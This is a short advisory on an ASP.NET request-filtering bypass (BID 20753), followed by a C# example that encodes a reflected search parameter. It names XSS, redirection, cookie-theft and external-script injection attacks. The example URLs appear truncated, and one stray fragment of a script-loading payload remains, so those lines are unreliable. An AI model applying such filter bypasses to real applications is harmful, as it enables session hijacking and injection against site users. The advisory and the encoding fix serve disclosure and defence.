Microsoft .NET request filtering bypass vulnerability (BID 20753)

Reportedly, request filtering is possible in ASP.NET.

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform XSS and HTML injection attacks.
It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application set up in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customers' live environments.

Looks like an Expression trick.

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target/vuln-search.aspx?term=

Redirection Attack
http://target/vuln-search.aspx?term=

Cookie stealing
http://target/vuln-search.aspx?term=

Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=

er/xss.js"))>
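
Since the advisory shows that request filtering can be bypassed, the reflected `term` value has to be encoded where it is written into the page. The following is an added example, not code from the advisory or from Microsoft; the class and method names (`SearchPage`, `Render`) and the sample inputs are assumptions made for illustration.

```csharp
using System;
using System.Net;
using System.Text;

// Added example: hypothetical renderer for a search page such as vuln-search.aspx.
static class SearchPage
{
    // Build the response fragment for a reflected "term" query parameter.
    // Every sink encodes for its own context; nothing relies on request filtering.
    public static string Render(string term)
    {
        term ??= string.Empty;

        // HTML body and attribute context: <, >, &, " and ' become entities.
        string html = WebUtility.HtmlEncode(term);

        // URL query-string context: percent-encode before building the link.
        string url = "vuln-search.aspx?term=" + Uri.EscapeDataString(term);

        var sb = new StringBuilder();
        sb.Append("<p>Results for: ").Append(html).Append("</p>\n");
        sb.Append("<input name=\"term\" value=\"").Append(html).Append("\">\n");
        sb.Append("<a href=\"").Append(WebUtility.HtmlEncode(url)).Append("\">permalink</a>\n");
        return sb.ToString();
    }
}

static class Program
{
    static void Main()
    {
        // Constructed sample inputs: markup characters that must come out inert.
        string[] samples = { "plain words", "<b>bold</b>", "a\" b='c' & d" };
        foreach (string s in samples)
        {
            string page = SearchPage.Render(s);
            Console.WriteLine(page);
            // Raw markup or an unescaped quote must never be reflected verbatim.
            bool inert = !page.Contains("<b>") && !page.Contains("value=\"a\" ");
            Console.WriteLine(inert ? "OK: rendered as text" : "FAIL: raw markup reflected");
        }
    }
}
```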